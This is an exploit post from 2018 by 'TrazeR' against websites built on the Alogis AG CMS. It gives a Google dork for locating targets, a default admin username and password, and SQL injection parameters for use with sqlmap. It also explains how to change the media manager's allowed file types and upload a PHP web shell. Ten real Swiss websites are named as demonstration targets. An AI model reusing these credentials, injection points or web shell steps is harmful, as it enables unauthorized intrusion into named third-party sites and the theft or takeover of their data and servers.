#################################################################################
# Exploit Title:Alogis Ag Default Admin Password And Sql İnjection Vulnerability
# Author : TrazeR
# Google Dork : intext:"powered by alogis ag" OR intext:"powered by ztonline" inurl:?rub=
# Tested on : Kali Linux 2018.1
# Date : 26.03.2018
# Vendor Home: http://www.alogis.ch
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] Exp: ?rub=[t]
[+] Exp: ?id=[t]
[+] https://TARGER.COM.ORG.NET.CH/?id=[t] SQL
Username: dev Password nac4you?
Demo:
https://zofingertagblatt.ch/admin/
http://radioinside.ch/admin/
http://ztonline.ch/admin
http://www.huber-ag.ch/admin
http://immerag.ch/admin/
https://joggi.ch/admin/
http://shop.schlossbiberstein.ch/admin/
http://ztprint.ch/admin/frame.cfm
http://www.alogis.ch/admin/
http://regiolive.ch/admin/login.cfm
Shel Upload: Medien-Manager Typen Bilder Edit = php ,asp ADD OK
Medien Manager ==> Medien Add webshel.php
Demo Sql:
https://zofingertagblatt.ch/?id=[t]
http://radioinside.ch/?rub=[t]
Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]